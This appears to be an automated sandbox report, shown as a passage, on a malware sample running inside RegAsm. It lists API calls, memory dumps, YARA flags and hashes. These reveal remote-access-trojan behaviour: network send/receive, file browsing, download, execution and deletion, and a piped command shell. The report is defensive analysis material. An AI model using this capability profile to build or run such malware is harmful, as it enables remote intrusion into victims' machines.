                                                          APIs
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID:
                                                          • API String ID: 1953588214-0
                                                          • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                          • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                          • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                          • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                          APIs
                                                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                          • String ID:
                                                          • API String ID: 3750050125-0
                                                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                          • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                          • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                          • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          • API String ID: 29597999-0
                                                          • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                          • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                          • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                          • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                          • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                            • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                            • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                            • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                            • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                            • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID:
                                                          • API String ID: 1170566393-0
                                                          • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                          • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                          • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                          • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                          APIs
                                                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                          • String ID:
                                                          • API String ID: 806969131-0
                                                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                          APIs
                                                            • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                          • String ID:
                                                          • API String ID: 806969131-0
                                                          • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                          • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                                                          • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                          • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                                                          APIs
                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: __crt_fast_encode_pointer
                                                          • String ID:
                                                          • API String ID: 3768137683-0
                                                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                          • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                          • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                          • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm
                                                          • String ID:
                                                          • API String ID: 65215352-0
                                                          • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                          • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                                                          • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                          • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                          • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                          • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                          • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                          • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                          • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                          • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                          APIs
                                                          • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FromGdipImageLoadStream
                                                          • String ID:
                                                          • API String ID: 3292405956-0
                                                          • Opcode ID: e0ea2fd9c2167727364d599a07cfbc1f38e77f7b891a0d9c190b1ac43297e8d6
                                                          • Instruction ID: 0579cdaa2312361b05b1f830050c5177e031bffd5630af46111334d5679ce4a0
                                                          • Opcode Fuzzy Hash: e0ea2fd9c2167727364d599a07cfbc1f38e77f7b891a0d9c190b1ac43297e8d6
                                                          • Instruction Fuzzy Hash: 67D0C9B6504310AFC3619F04DC40AA2B7E8EB19322F11882BA495C3620D3749C448B64
                                                          APIs
                                                          • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GdipImageSaveStream
                                                          • String ID:
                                                          • API String ID: 971487142-0
                                                          • Opcode ID: 2f33f8506b529e9adaa30f706a2711de8e29ced3bba7258ed69267e28c87a11e
                                                          • Instruction ID: 17179325133ec8d5665930926395a02cde82b473ee5165108a88b5cb6818835a
                                                          • Opcode Fuzzy Hash: 2f33f8506b529e9adaa30f706a2711de8e29ced3bba7258ed69267e28c87a11e
                                                          • Instruction Fuzzy Hash: 15C0C932008351AB8B529F409C09C9FBAA6BB88310B040C1DF15542121CB258C659B65
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: d0931feda09ce7f383c7c6ce2665332ecb22035d53701456b05fd966ed568352
                                                          • Instruction ID: dbdeaac90e0e6d62f0477abc41fa170e90117b3f4e073e3287e2bae6f82229ff
                                                          • Opcode Fuzzy Hash: d0931feda09ce7f383c7c6ce2665332ecb22035d53701456b05fd966ed568352
                                                          • Instruction Fuzzy Hash: 10C04CF1514200BFB604CB20CD89D37B79DD75070171589697944D2551D576DC41D538
                                                          APIs
                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Deallocatestd::_
                                                          • String ID:
                                                          • API String ID: 1323251999-0
                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                          • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                          • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                          • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                          • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                          • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                          • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                          APIs
                                                          • GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DisposeGdipImage
                                                          • String ID:
                                                          • API String ID: 1024088383-0
                                                          • Opcode ID: 0d829d07429a4b0b4d75c9354fe46aa387a3f48e8024eabd43fe848e5855e457
                                                          • Instruction ID: e934c4c25458857afa6134ff150cf5673f3742efb43c7687e3c91c45999faaed
                                                          • Opcode Fuzzy Hash: 0d829d07429a4b0b4d75c9354fe46aa387a3f48e8024eabd43fe848e5855e457
                                                          • Instruction Fuzzy Hash: B9A011B0000200CFCF020F208B080203EA0AB0A30A32080E8800808222C333C803CE2A
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                            • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                            • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                            • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                          • DeleteFileA.KERNEL32(?), ref: 00408652
                                                            • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                            • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                            • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                            • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                          • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                          • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                            • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                          • API String ID: 1067849700-181434739
                                                          • Opcode ID: 813a6fb303c9f4b62c1c58356d3233b42dee4b738cbd8f40aa8a792e01496f6c
                                                          • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                          • Opcode Fuzzy Hash: 813a6fb303c9f4b62c1c58356d3233b42dee4b738cbd8f40aa8a792e01496f6c
                                                          • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
